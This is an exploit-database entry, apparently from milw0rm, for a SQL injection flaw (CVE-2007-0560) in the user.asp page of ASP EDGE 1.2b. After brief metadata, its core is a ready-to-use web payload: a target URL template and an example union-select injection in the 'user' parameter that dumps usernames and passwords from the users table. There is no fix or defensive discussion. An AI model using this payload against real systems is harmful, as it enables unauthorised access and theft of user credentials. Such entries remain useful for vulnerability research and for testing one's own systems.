ASP EDGE 1.2b - 'user.asp' SQL Injection
Author: ajann
type: webapps
platform: asp
port:
date_added: 2007-01-23
date_updated:
verified: 1
codes: OSVDB-31619;CVE-2007-0560
tags:
aliases:
screenshot_url:
application_url:
*******************************************************************************
# Title : ASP EDGE <= V1.2b (user.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://aspedge.cjb.net || http://www.planetsourcecode.com/vb/scripts/ShowCode.asp?txtCodeId=7530&lngWId=4
# $$ : Free
*******************************************************************************
[[SQL]]]---------------------------------------------------------
http://[target]/[path]//user.asp?user=[SQL]
Example:
//user.asp?user='union%20select%20username,0,username,0,password,0,0,0,0,0%20from%20users
[[/SQL]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2007-01-24]